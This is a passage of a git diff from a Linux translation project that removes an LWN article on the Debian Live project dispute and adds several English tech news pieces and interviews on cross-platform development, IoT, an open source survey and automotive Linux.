-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.maketecheasier.com/author/ayoisaiah/
diff --git a/sources/talk/20151227 Upheaval in the Debian Live project.md b/sources/talk/20151227 Upheaval in the Debian Live project.md
deleted file mode 100644
index d663d09b17..0000000000
--- a/sources/talk/20151227 Upheaval in the Debian Live project.md
+++ /dev/null
@@ -1,66 +0,0 @@
-While the event had a certain amount of drama surrounding it, the [announcement][1] of the end for the [Debian Live project][2] seems likely to have less of an impact than it first appeared. The loss of the lead developer will certainly be felt—and the treatment he and the project received seems rather baffling—but the project looks like it will continue in some form. So Debian will still have tools to create live CDs and other media going forward, but what appears to be a long-simmering dispute between project founder and leader Daniel Baumann and the Debian CD and installer teams has been "resolved", albeit in an unfortunate fashion.
-
-The November 9 announcement from Baumann was titled "An abrupt End to Debian Live". In that message, he pointed to a number of different events over the nearly ten years since the [project was founded][3] that indicated to him that his efforts on Debian Live were not being valued, at least by some. The final straw, it seems, was an "intent to package" (ITP) bug [filed][4] by Iain R. Learmonth that impinged on the namespace used by Debian Live.
-
-Given that one of the main Debian Live packages is called "live-build", the new package's name, "live-build-ng", was fairly confrontational in and of itself. Live-build-ng is meant to be a wrapper around the [vmdebootstrap][5] tool for creating live media (CDs and USB sticks), which is precisely the role Debian Live is filling. But when Baumann [asked][6] Learmonth to choose a different name for his package, he got an "interesting" [reply][7]:
-
-```
-It is worth noting that live-build is not a Debian project, it is an external project that claims to be an official Debian project. This is something that needs to be fixed.
-There is no namespace issue, we are building on the existing live-config and live-boot packages that are maintained and bringing these into Debian as native projects. If necessary, these will be forks, but I'm hoping that won't have to happen and that we can integrate these packages into Debian and continue development in a collaborative manner.
-live-build has been deprecated by debian-cd, and live-build-ng is replacing it. In a purely Debian context at least, live-build is deprecated. live-build-ng is being developed in collaboration with debian-cd and D-I [Debian Installer].
-```
-
-Whether or not Debian Live is an "official" Debian project (or even what "official" means in this context) has been disputed in the thread. Beyond that, though, Neil Williams (who is the maintainer of vmdebootstrap) [provided some][8] explanation for the switch away from Debian Live:
-
-```
-vmdebootstrap is being extended explicitly to provide support for a replacement for live-build. This work is happening within the debian-cd team to be able to solve the existing problems with live-build. These problems include reliability issues, lack of multiple architecture support and lack of UEFI support. vmdebootstrap has all of these, we do use support from live-boot and live-config as these are out of the scope for vmdebootstrap.
-```
-
-Those seem like legitimate complaints, but ones that could have been fixed within the existing project. Instead, though, something of a stealth project was evidently undertaken to replace live-build. As Baumann [pointed out][9], nothing was posted to the debian-live mailing list about the plans. The ITP was the first notice that anyone from the Debian Live project got about the plans, so it all looks like a "secret plan"—something that doesn't sit well in a project like Debian.
-
-As might be guessed, there were multiple postings that supported Baumann's request to rename "live-build-ng", followed by many that expressed dismay at his decision to stop working on Debian Live. But Learmonth and Williams were adamant that replacing live-build is needed. Learmonth did [rename][10] live-build-ng to a perhaps less confrontational name: live-wrapper. He noted that his aim had been to add the new tool to the Debian Live project (and "bring the Debian Live project into Debian"), but things did not play out that way.
-
-```
-I apologise to everyone that has been upset by the ITP bug. The software is not yet ready for use as a full replacement for live-build, and it was filed to let people know that the work was ongoing and to collect feedback. This sort of worked, but the feedback wasn't the kind I was looking for.
-```
-
-The backlash could perhaps have been foreseen. Communication is a key aspect of free-software communities, so a plan to replace the guts of a project seems likely to be controversial—more so if it is kept under wraps. For his part, Baumann has certainly not been perfect—he delayed the "wheezy" release by [uploading an unsuitable syslinux package][11] and [dropped down][12] from a Debian Developer to a Debian Maintainer shortly thereafter—but that doesn't mean he deserves this kind of treatment. There are others involved in the project as well, of course, so it is not just Baumann who is affected.
-
-One of those other people is Ben Armstrong, who has been something of a diplomat during the event and has tried to smooth the waters. He started with a [post][13] that celebrated the project and what Baumann and the team had accomplished over the years. As he noted, the [list of downstream projects][14] for Debian Live is quite impressive. In another post, he also [pointed out][15] that the project is not dead:
-
-```
-If the Debian CD team succeeds in their efforts and produces a replacement that is viable, reliable, well-tested, and a suitable candidate to replace live-build, this can only be good for Debian. If they are doing their job, they will not "[replace live-build with] an officially improved, unreliable, little-tested alternative". I've seen no evidence so far that they operate that way. And in the meantime, live-build remains in the archive -- there is no hurry to remove it, so long as it remains in good shape, and there is not yet an improved successor to replace it.
-```
-
-On November 24, Armstrong also [posted][16] an update (and to [his blog][17]) on Debian Live. It shows some good progress made in the two weeks since Baumann's exit; there are even signs of collaboration between the project and the live-wrapper developers. There is also a [to-do list][18], as well as the inevitable call for more help. That gives reason to believe that all of the drama surrounding the project was just a glitch—avoidable, perhaps, but not quite as dire as it might have seemed.
-
-
----------------------------------
-
-via: https://lwn.net/Articles/665839/
-
-作者:Jake Edge
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-
-[1]: https://lwn.net/Articles/666127/
-[2]: http://live.debian.net/
-[3]: https://www.debian.org/News/weekly/2006/08/
-[4]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=804315
-[5]: http://liw.fi/vmdebootstrap/
-[6]: https://lwn.net/Articles/666173/
-[7]: https://lwn.net/Articles/666176/
-[8]: https://lwn.net/Articles/666181/
-[9]: https://lwn.net/Articles/666208/
-[10]: https://lwn.net/Articles/666321/
-[11]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699808
-[12]: https://nm.debian.org/public/process/14450
-[13]: https://lwn.net/Articles/666336/
-[14]: http://live.debian.net/project/downstream/
-[15]: https://lwn.net/Articles/666338/
-[16]: https://lwn.net/Articles/666340/
-[17]: http://syn.theti.ca/2015/11/24/debian-live-after-debian-live/
-[18]: https://wiki.debian.org/DebianLive/TODO
diff --git a/sources/talk/20160505 Confessions of a cross-platform developer.md b/sources/talk/20160505 Confessions of a cross-platform developer.md
new file mode 100644
index 0000000000..0f6af84070
--- /dev/null
+++ b/sources/talk/20160505 Confessions of a cross-platform developer.md
@@ -0,0 +1,76 @@
+vim-kakali translating
+
+
+
+Confessions of a cross-platform developer
+=============================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/business_clouds.png?itok=cucHuJnU)
+
+[Andreia Gaita][1] is giving a talk at this year's OSCON, titled [Confessions of a cross-platform developer][2]. She's a long-time open source and [Mono][3] contributor, and develops primarily in C#/C++. Andreia works at GitHub, where she's focused on building the GitHub Extension manager for Visual Studio.
+
+I caught up with Andreia ahead of her talk to ask about cross-platform development and what she's learned in her 16 years as a cross-platform developer.
+
+![](https://opensource.com/sites/default/files/images/life/Interview%20banner%20Q%26A.png)
+
+**What languages have you found easiest and hardest to develop cross-platform code for?**
+
+It's less about which languages are good and more about the libraries and tooling available for those languages. The compilers/interpreters/build systems available for languages determine how easy it is to do cross-platform work with them (or whether it's even possible), and the libraries available for UI and native system access determine how deep you can integrate with the OS. With that in mind, I found C# to be the best for cross-platform work. The language itself includes features that allow fast native calls and accurate memory mapping, which you really need if you want your code to talk to the OS and native libraries. When I need very specific OS integration, I switch to C or C++.
+
+**What cross-platform toolkits/abstractions have you used?**
+
+Most of my cross-platform work has been developing tools, libraries and bindings for other people to develop cross-platform applications with, mostly in Mono/C# and C/C++. I don't get to use a lot of abstractions at that level, beyond glib and friends. I mostly rely on Mono for any cross-platform app that includes a UI, and Unity3D for the occasional game development. I play with Electron every now and then.
+
+**What has been your approach to build systems, and how does this vary by language or platform?**
+
+I try to pick the build system that is most suited for the language(s) I'm using. That way, it'll (hopefully) give me less headaches. It needs to allow for platform and architecture selection, be smart about build artifact locations (for multiple parallel builds), and be decently configurable. Most of the time I have projects combining C/C++ and C# and I want to build all the different configurations at the same time from the same source tree (Debug, Release, Windows, OSX, Linux, Android, iOS, etc, etc.), and that usually requires selecting and invoking different compilers with different flags per output build artifact. So the build system has to let me do all of this without getting (too much) in my way. I try out different build systems every now and then, just to see what's new, but in the end, I end up going back to makefiles and a combination of either shell and batch scripts or Perl scripts for driving them (because if I want users to build my things, I'd better pick a command line script language that is available everywhere).
+
+**How do you balance the desire for native look and feel with the need for uniform user interfaces?**
+
+Cross-platform UI is hard! I've implemented several cross-platform GUIs over the years, and it's the one thing for which I don't think there's an optimal solution. There's basically two options. You can pick a cross-platform GUI toolkit and do a UI that doesn't feel quite right in all the platforms you support, with a small codebase and low maintenance cost. Or you can choose to develop platform-specific UIs that will look and feel native and well integrated with a larger codebase and higher maintenance cost. The decision really depends on the type of app, how many features it has, how many resources you have, and how many platforms you're shipping to.
+
+In the end, I think there's an increase in users' tolerance for "One UI To Rule Them All" with frameworks like Electron. I have a Chromium+C+C# framework side project that will one day hopefully allow me build Electron-style apps in C#, giving me the best of both worlds.
+
+**Has building/packaging dependencies been an issue for you?**
+
+I'm very conservative about my use of dependencies, having been bitten so many times by breaking ABIs, clashing symbols, and missing packages. I decide which OS version(s) I'm targeting and pick the lowest common denominator release available of a dependency to minimize issues. That usually means having five different copies of Xcode and OSX Framework libraries, five different versions of Visual Studio installed side-to-side on the same machine, multiple clang and gcc versions, and a bunch of VMs running various other distros. If I'm unsure of the state of packages in the OS I'm targeting, I will sometimes link statically and sometimes submodule dependencies to make sure they're always available. And most of all, I avoid the bleeding edge unless I really, really need something there.
+
+**Do you use continuous integration, code review, and related tools?**
+
+All the time! It's the only way to keep sane. The first thing I do on a project is set up cross-platform build scripts to ensure everything is automateable as early as possible. When you're targeting multiple platforms, CI is essential. It's impossible for everyone to build all the different combinations of platforms in one machine, and as soon as you're not building all of them you're going to break something without being aware of it. In a shared multi-platform codebase, different people own different platforms and features, so the only way to guarantee quality is to have cross-team code reviews combined with CI and other analysis tools. It's no different than other software projects, there's just more points of failure.
+
+**Do you rely on automated build testing, or do you tend to build on each platform and test locally?**
+
+For tools and libraries that don't include UIs, I can usually get away with automated build testing. If there's a UI, then I need to do both—reliable, scriptable UI automation for existing GUI toolkits is rare to non-existent, so I would have to either invest in creating UI automation tools that work across all the platforms I want to support, or I do it manually. If a project uses a custom UI toolkit (like, say, an OpenGL UI like Unity3D does), then it's fairly easy to develop scriptable automation tools and automate most of that stuff. Still, there's nothing like the human ability to break things with a couple of clicks!
+
+**If you are developing cross-platform, do you support cross-editor build systems so that you can use Visual Studio on Windows, Qt Creator on Linux, and XCode on Mac? Or do you tend toward supporting one platform such as Eclipse on all platforms?**
+
+I favor cross-editor build systems. I prefer generating project files for different IDEs (preferably in a way that makes it easier to add more IDEs), with build scripts that can drive builds from the IDEs for the platform they're on. Editors are the most important tool for a developer. It takes time and effort to learn them, and they're not interchangeable. I have my favorite editors and tools, and everyone else should be able to use their favorite tool, too.
+
+**What is your preferred editor/development environment/IDE for cross-platform development?**
+
+The cross-platform developer is cursed with having to pick the lowest common denominator editor that works across the most platforms. I love Visual Studio, but I can't rely on it for anything except Windows work (and you really don't want to make Windows your primary cross-compiling platform), so I can't make it my primary IDE. Even if I could, an essential skill of cross-platform development is to know and use as many platforms as possible. That means really knowing them—using the platform's editors and libraries, getting to know the OS and its assumptions, behaviors, and limitations, etc. To do that and keep my sanity (and my shortcut muscle memory), I have to rely on cross-platform editors. So, I use Emacs and Sublime.
+
+**What are some of your favorite past and current cross-platform projects?**
+
+Mono is my all-time favorite, hands down, and most of the others revolve around it in some way. Gluezilla was a Mozilla binding I did years ago to allow C# apps to embed web browser views, and that one was a doozy. At one point I had a Winforms app, built on Linux, running on Windows with an embedded GTK view in it that was running a Mozilla browser view. The CppSharp project (formerly Cxxi, formerly CppInterop) is a project I started to generate C# bindings for C++ libraries so that you could call, create instances of, and subclass C++ classes from C#. It was done in such a way that it would detect at runtime what platform you'd be running on and what compiler was used to create the native library and generate the correct C# bindings for it. That was fun!
+
+**Where do you see cross-platform development heading in the future?**
+
+The way we build native applications is already changing, and I feel like the visual differences between the various desktop operating systems are going to become even more blurred so that it will become easier to build cross-platform apps that integrate reasonably well without being fully native. Unfortunately, that might mean applications will be worse in terms of accessibility and less innovative when it comes to using the OS to its full potential. Cross-platform development of tools, libraries, and runtimes is something that we know how to do well, but there's still a lot of work to do with cross-platform application development.
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/5/oscon-interview-andreia-gaita
+
+作者:[Marcus D. Hanwell ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/mhanwell
+[1]: https://twitter.com/sh4na
+[2]: http://conferences.oreilly.com/oscon/open-source-us/public/schedule/detail/48702
+[3]: http://www.mono-project.com/
diff --git a/sources/talk/20160506 Linus Torvalds Talks IoT Smart Devices Security Concerns and More.md b/sources/talk/20160506 Linus Torvalds Talks IoT Smart Devices Security Concerns and More.md
new file mode 100644
index 0000000000..e17c33bd81
--- /dev/null
+++ b/sources/talk/20160506 Linus Torvalds Talks IoT Smart Devices Security Concerns and More.md
@@ -0,0 +1,46 @@
+Linus Torvalds Talks IoT, Smart Devices, Security Concerns, and More[video]
+===========================================================================
+
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elc-linus-b.jpg?itok=6WwnCSjL)
+>Dirk Hohndel interviews Linus Torvalds at ELC.
+
+For the first time in the 11-year history of the [Embedded Linux Conference (ELC)][0], held in San Diego, April 4-6, the keynotes included a discussion with Linus Torvalds. The creator and lead overseer of the Linux kernel, and “the reason we are all here,” in the words of his interviewer, Intel Chief Linux and Open Source Technologist Dirk Hohndel, seemed upbeat about the state of Linux in embedded and Internet of Things applications. Torvalds very presence signaled that embedded Linux, which has often been overshadowed by Linux desktop, server, and cloud technologies, had come of age.
+
+![](https://www.linux.com/sites/lcom/files/styles/floated_images/public/elc-linus_0.jpg?itok=FNPIDe8k)
+>Linus Torvalds speaking at Embedded Linux Conference.
+
+IoT was the main topic at ELC, which included an OpenIoT Summit track, and the chief topic in the Torvalds interview.
+
+“Maybe you won’t see Linux at the IoT leaf nodes, but anytime you have a hub, you will need it,” Torvalds told Hohndel. “You need smart devices especially if you have 23 [IoT standards]. If you have all these stupid devices that don’t necessarily run Linux, and they all talk with slightly different standards, you will need a lot of smart devices. We will never have one completely open standard, one ring to rule them all, but you will have three of four major protocols, and then all these smart hubs that translate.”
+
+Torvalds remained customarily philosophical when Hohndel asked about the gaping security holes in IoT. “I don’t worry about security because there’s not a lot we can do,” he said. “IoT is unpatchable -- it’s a fact of life.”
+
+The Linux creator seemed more concerned about the lack of timely upstream contributions from one-off embedded projects, although he noted there have been significant improvements in recent years, partially due to consolidation on hardware.
+
+“The embedded world has traditionally been hard to interact with as an open source developer, but I think that’s improving,” Torvalds said. “The ARM community has become so much better. Kernel people can now actually keep up with some of the hardware improvements. It’s improving, but we’re not nearly there yet.”
+
+Torvalds admitted to being more at home on the desktop than in embedded and to having “two left hands” when it comes to hardware.
+
+“I’ve destroyed things with a soldering iron many times,” he said. “I’m not really set up to do hardware.” On the other hand, Torvalds guessed that if he were a teenager today, he would be fiddling around with a Raspberry Pi or BeagleBone. “The great part is if you’re not great at soldering, you can just buy a new one.”
+
+Meanwhile, Torvalds vowed to continue fighting for desktop Linux for another 25 years. “I’ll wear them down,” he said with a smile.
+
+Watch the full video, below.
+
+Get the Latest on Embedded Linux and IoT. Access 150+ recorded sessions from Embedded Linux Conference 2016. [Watch Now][1].
+
+[video](https://youtu.be/tQKUWkR-wtM)
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/linus-torvalds-talks-iot-smart-devices-security-concerns-and-more-video
+
+作者:[ERIC BROWN][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.linux.com/users/ericstephenbrown
+[0]: http://events.linuxfoundation.org/events/embedded-linux-conference
+[1]: http://go.linuxfoundation.org/elc-openiot-summit-2016-videos?utm_source=lf&utm_medium=blog&utm_campaign=linuxcom
diff --git a/sources/talk/20160510 65% of companies are contributing to open source projects.md b/sources/talk/20160510 65% of companies are contributing to open source projects.md
new file mode 100644
index 0000000000..ad3b4ef680
--- /dev/null
+++ b/sources/talk/20160510 65% of companies are contributing to open source projects.md
@@ -0,0 +1,63 @@
+65% of companies are contributing to open source projects
+==========================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_openseries.png?itok=s7lXChId)
+
+This year marks the 10th annual Future of Open Source Survey to examine trends in open source, hosted by Black Duck and North Bridge. The big takeaway from the survey this year centers around the mainstream acceptance of open source today and how much has changed over the last decade.
+
+The [2016 Future of Open Source Survey][1] analyzed responses from nearly 3,400 professionals. Developers made their voices heard in the survey this year, comprising roughly 70% of the participants. The group that showed exponential growth were security professionals, whose participation increased by over 450%. Their participation shows the increasing interest in ensuring that the open source community pays attention to security issues in open source software and securing new technologies as they emerge.
+
+Black Duck's [Open Source Rookies][2] of the Year awards identify some of these emerging technologies, like Docker and Kontena in containers. Containers themselves have seen huge growth this year–76% of respondents say their company has some plans to use containers. And an amazing 59% of respondents are already using containers in a variety of deployments, from development and testing to internal and external production environment. The developer community has embraced containers as a way to get their code out quickly and easily.
+
+It's not surprising that the survey shows a miniscule number of organizations having no developers contributing to open source software. When large corporations like Microsoft and Apple open source some of their solutions, developers gain new opportunities to participate in open source. I certainly hope this trend will continue, with more software developers contributing to open source projects at work and outside of work.
+
+### Highlights from the 2016 survey
+
+#### Business value
+
+* Open source is an essential element in development strategy with more than 65% of respondents relying on open source to speed development.
+* More than 55% leverage open source within their production environments.
+
+#### Engine for innovation
+
+* Respondents reported use of open source to drive innovation through faster, more agile development; accelerated time to market and vastly superior interoperability.
+* Additional innovation is afforded by open source's quality of solutions; competitive features and technical capabilities; and ability to customize.
+
+#### Proliferation of open source business models and investment
+
+* More diverse business models are emerging that promise to deliver more value to open source companies than ever before. They are not as dependent on SaaS and services/support.
+* Open source private financing has increased almost 4x in five years.
+
+#### Security and management
+
+The development of best-in-class open source security and management practices has not kept pace with growth in adoption. Despite a proliferation of expensive, high-profile open source breaches in recent years, the survey revealed that:
+
+* 50% of companies have no formal policy for selecting and approving open source code.
+* 47% of companies don’t have formal processes in place to track open source code, limiting their visibility into their open source and therefore their ability to control it.
+* More than one-third of companies have no process for identifying, tracking or remediating known open source vulnerabilities.
+
+#### Open source participation on the rise
+
+The survey revealed an active corporate open source community that spurs innovation, delivers exponential value and shares camaraderie:
+
+* 67% of respondents report actively encouraging developers to engage in and contribute to open source projects.
+* 65% of companies are contributing to open source projects.
+* One in three companies have a fulltime resource dedicated to open source projects.
+* 59% of respondents participate in open source projects to gain competitive edge.
+
+Black Duck and North Bridge learned a great deal this year about security, policy, business models and more from the survey, and we’re excited to share these findings. Thank you to our many collaborators and all the respondents for taking the time to take the survey. It’s been a great ten years, and I am happy that we can safely say that the future of open source is full of possibilities.
+
+Learn more, see the [full results][3].
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/5/2016-future-open-source-survey
+
+作者:[Haidee LeClair][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/blackduck2016
+[1]: http://www.slideshare.net/blackducksoftware/2016-future-of-open-source-survey-results
+[2]: https://info.blackducksoftware.com/OpenSourceRookies2015.html
+[3]: http://www.slideshare.net/blackducksoftware/2016-future-of-open-source-survey-results%C2%A0
diff --git a/sources/talk/20160516 Linux will be the major operating system of 21st century cars.md b/sources/talk/20160516 Linux will be the major operating system of 21st century cars.md
new file mode 100644
index 0000000000..ec7a33aaa6
--- /dev/null
+++ b/sources/talk/20160516 Linux will be the major operating system of 21st century cars.md
@@ -0,0 +1,38 @@
+Linux will be the major operating system of 21st century cars
+===============================================================
+
+>Cars are more than engines and good looking bodies. They're also complex computing devices so, of course, Linux runs inside them.
+
+Linux doesn't just run your servers and, via Android, your phones. It also runs your cars. Of course, no one has ever bought a car for its operating system. But Linux is already powering the infotainment, heads-up display and connected car 4G and Wi-Fi systems for such major car manufacturers as Toyota, Nissan, and Jaguar Land Rover and [Linux is on its way to Ford][1], Mazda, Mitsubishi, and Subaru cars.
+
+![](http://zdnet4.cbsistatic.com/hub/i/2016/05/10/743f0c14-6458-4d1e-8723-d2d94d0d0e69/c297b7d52e27e97d8721d4cb46bb371b/agl-logo.jpg)
+>All the Linux and open-source car software efforts have now been unified under the Automotive Grade Linux project.
+
+Software companies are also getting into this Internet of mobile things act. Movimento, Oracle, Qualcomm, Texas Instruments, UIEvolution and VeriSilicon have all [joined the Automotive Grade Linux (AGL)][2] project. The [AGL][3] is a collaborative open-source project devoted to creating a common, Linux-based software stack for the connected car.
+
+AGL has seen tremendous growth over the past year as demand for connected car technology and infotainment are rapidly increasing," said Dan Cauchy, the Linux Foundation's General Manager of Automotive, in a statement.
+
+Cauchy continued, "Our membership base is not only growing rapidly, but it is also diversifying across various business interests, from semiconductors and in-vehicle software to IoT and connected cloud services. This is a clear indication that the connected car revolution has broad implications across many industry verticals."
+
+These companies have joined after AGL's recent announcement of a new AGL Unified Code Base (UCB). This new Linux distribution is based on AGL and two other car open-source projects: [Tizen][4] and the [GENIVI Alliance][5]. UCB is a second-generation car Linux. It was built from the ground up to address automotive specific applications. It handles navigation, communications, safety, security and infotainment functionality,
+
+"The automotive industry needs a standard open operating system and framework to enable automakers and suppliers to quickly bring smartphone-like capabilities to the car," said Cauchy. "This new distribution integrates the best components from AGL, Tizen, GENIVI and related open-source code into a single AGL Unified Code Base, allowing car-makers to leverage a common platform for rapid innovation. The AGL UCB distribution will play a huge role in the adoption of Linux-based systems for all functions in the vehicle."
+
+He's right. Since its release in January 2016, four car companies and ten new software businesses have joined AGL. Esso, now Exxon, made the advertising slogan, "Put a tiger in your tank!" famous. I doubt that "Put a penguin under your hood" will ever become well-known, but that's exactly what's happening. Linux is well on its way to becoming the major operating system of 21st century cars.
+
+------------------------------------------------------------------------------
+
+via: http://www.zdnet.com/article/the-linux-in-your-car-movement-gains-momentum/
+
+作者:[Steven J. Vaughan-Nichols][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
+[1]: https://www.automotivelinux.org/news/announcement/2016/01/ford-mazda-mitsubishi-motors-and-subaru-join-linux-foundation-and
+[2]: https://www.automotivelinux.org/news/announcement/2016/05/oracle-qualcomm-innovation-center-texas-instruments-and-others-support
+[3]: https://www.automotivelinux.org/
+[4]: https://www.tizen.org/
+[5]: http://www.genivi.org/
diff --git a/sources/talk/20160523 Driving cars into the future with Linux.md b/sources/talk/20160523 Driving cars into the future with Linux.md
new file mode 100644
index 0000000000..38ef546789
--- /dev/null
+++ b/sources/talk/20160523 Driving cars into the future with Linux.md
@@ -0,0 +1,104 @@
+Driving cars into the future with Linux
+===========================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/open-snow-car-osdc-lead.png?itok=IgYZ6mNY)
+
+I don't think much about it while I'm driving, but I sure do love that my car is equipped with a system that lets me use a few buttons and my voice to call my wife, mom, and children. That same system allows me to choose whether I listen to music streaming from the cloud, satellite radio, or the more traditional AM/FM radio. I also get weather updates and can direct my in-vehicle GPS to find the fastest route to my next destination. [In-vehicle infotainment][1], or IVI as it's known in the industry, has become ubiquitous in today's newest automobiles.
+
+A while ago, I had to travel hundreds of miles by plane and then rent a car. Happily, I discovered that my rental vehicle was equipped with IVI technology similar to my own car. In no time, I was connected via Bluetooth, had uploaded my contacts into the system, and was calling home to let my family know I arrived safely and my hosts to let them know I was en route to their home.
+
+In a recent [news roundup][2], Scott Nesbitt cited an article that said Ford Motor Company is getting substantial backing from a rival automaker for its open source [Smart Device Link][3] (SDL) middleware framework, which supports mobile phones. SDL is a project of the [GENIVI Alliance][4], a nonprofit committed to building middleware to support open source in-vehicle infotainment systems. According to [Steven Crumb][5], executive director of GENIVI, their [membership][6] is broad and includes Daimler Group, Hyundai, Volvo, Nissan, Honda, and 170 others.
+
+In order to remain competitive in the industry, automotive companies need a middleware system that can support the various human machine interface technologies available to consumers today. Whether you own an Android, iOS, or other device, automotive OEMs want their units to be able to support these systems. Furthermore, these IVI systems must be adaptable enough to support the ever decreasing half-life of mobile technology. OEMs want to provide value and add services in their IVI stacks that will support a variety of options for their customers. Enter Linux and open source software.
+
+In addition to GENIVI's efforts, the [Linux Foundation][7] sponsors the [Automotive Grade Linux][8] (AGL) workgroup, a software foundation dedicated to finding open source solutions for automotive applications. Although AGL will initially focus on IVI systems, they envision branching out to include [telematics][9], heads up displays, and other control systems. AGL has over 50 members at this time, including Jaguar, Toyota, and Nissan, and in a [recent press release][10] announced that Ford, Mazda, Mitsubishi, and Subaru have joined.
+
+To find out more, we interviewed two leaders in this emerging field. Specifically, we wanted to know how Linux and open source software are being used and if they are in fact changing the face of the automotive industry. First, we talk to [Alison Chaiken][11], a software engineer at Peloton Technology and an expert on automotive Linux, cybersecurity, and transparency. She previously worked for Mentor Graphics, Nokia, and the Stanford Linear Accelerator. Then, we chat with [Steven Crumb][12], executive director of GENIVI, who got started in open source in high-performance computing environments (supercomputers and early cloud computing). He says that though he's not a coder anymore, he loves to help organizations solve real business problems with open source software.
+
+### Interview with Alison Chaiken (by [Deb Nicholson][13])
+
+#### How did you get interested in the automotive software space?
+
+I was working on [MeeGo][14] in phones at Nokia in 2009 when the project was cancelled. I thought, what's next? A colleague was working on [MeeGo-IVI][15], an early automotive Linux distribution. "Linux is going to be big in cars," I thought, so I headed in that direction.
+
+#### Can you tell us what aspects you're working on these days?
+
+I'm currently working for a startup on an advanced cruise control system that uses real-time Linux to increase the safety and fuel economy of big-rig trucks. I love working in this area, as no one would disagree that trucking can be improved.
+
+#### There have been a few stories about hacked cars in recent years. Can open source solutions help address this issue?
+
+I presented a talk on precisely this topic, on how Linux can (and cannot) contribute to security solutions in automotive at Southern California Linux Expo 2016 ([Slides][16]). Notably, GENIVI and Automotive Grade Linux have published their code and both projects take patches via Git. Please send your fixes upstream! Many eyes make all bugs shallow.
+
+#### Law enforcement agencies and insurance companies could find plenty of uses for data about drivers. How easy will it be for them to obtain this information?
+
+Good question. The Dedicated Short Range Communication Standard (IEEE-1609) takes great pains to keep drivers participating in Wi-Fi safety messaging anonymous. Still, if you're posting to Twitter from your car, someone will be able to track you.
+
+#### What can developers and private citizens do to make sure civil liberties are protected as automotive technology evolves?
+
+The Electronic Frontier Foundation (EFF) has done an excellent job of keeping on top of automotive issues, having commented through official channels on what data may be stored in automotive "black boxes" and on how DMCA's Provision 1201 applies to cars.
+
+#### What are some of the exciting things you see coming for drivers in the next few years?
+
+Adaptive cruise control and collision avoidance systems are enough of an advance to save lives. As they roll out through vehicle fleets, I truly believe that fatalities will decline. If that's not exciting, I don't know what is. Furthermore, capabilities like automated parking assist will make cars easier to drive and reduce fender-benders.
+
+#### What needs to be built and how can people get involved?
+
+Automotive Grade Linux is developed in the open and runs on cheap hardware (e.g. Raspberry Pi 2 and moderately priced Renesas Porter board) that anyone can buy. GENIVI automotive Linux middleware consortium has lots of software publicly available via Git. Furthermore, there is the ultra cool [OSVehicle open hardware][17] automotive platform.
+
+#### There are many ways for Linux software and open hardware folks with moderate budgets to get involved. Join us at #automotive on Freenode IRC if you have questions.
+
+### Interview with Steven Crumb (by Don Watkins)
+
+#### What's so huge about GENIVI's approach to IVI?
+
+GENIVI filled a huge gap in the automotive industry by pioneering the use of free and open source software, including Linux, for non-safety-critical automotive software like in-vehicle infotainment (IVI) systems. As consumers came to expect the same functionality in their vehicles as on their smartphones, the amount of software required to support IVI functions grew exponentially. The increased amount of software has also increased the costs of building the IVI systems and thus slowed time to market.
+
+GENIVI's use of open source software and a community development model has saved automakers and their software suppliers significant amounts of money while significantly reducing the time to market. I'm excited about GENIVI because we've been fortunate to lead a revolution of sorts in the automotive industry by slowly evolving organizations from a highly structured and proprietary methodology to a community-based approach. We're not done yet, but it's been a privilege to take part in a transformation that is yielding real benefits.
+
+#### How do your major members drive the direction of GENIVI?
+
+GENIVI has a lot of members and non-members contributing to our work. As with many open source projects, any company can influence the technical output by simply contributing code, patches, and time to test. With that said, BMW, Mercedes-Benz, Hyundai Motor, Jaguar Land Rover, PSA, Renault/Nissan, and Volvo are all active adopters of and contributors to GENIVI—and many other OEMs have IVI solutions in their cars that extensively use GENIVI's software.
+
+#### What licenses cover the contributed code?
+
+GENIVI employs a number of licenses ranging from (L)GPLv2 to MPLv2 to Apache 2.0. Some of our tools use the Eclipse license. We have a [public licensing policy][18] that details our licensing preferences.
+
+#### How does a person or group get involved? How important are community contributions to the ongoing success of the project?
+
+GENIVI does its development completely in the open ([projects.genivi.org][19]) and thus, anyone interested in using open software in automotive is welcome to participate. That said, the alliance can fund its continued development in the open through companies [joining GENIVI][20] as members. GENIVI members enjoy a wide variety of benefits, not the least of which is participation in the global community of 140 companies that has been developed over the last six years.
+
+Community is hugely important to GENIVI, and we could not have produced and maintained the valuable software we developed over the years without an active community of contributors. We've worked hard to make contributing to GENIVI as simple as joining an [email list][21] and connecting to the people in the various software projects. We use standard practices employed by many open source projects and provide high-quality tools and infrastructure to help developers feel at home and be productive.
+
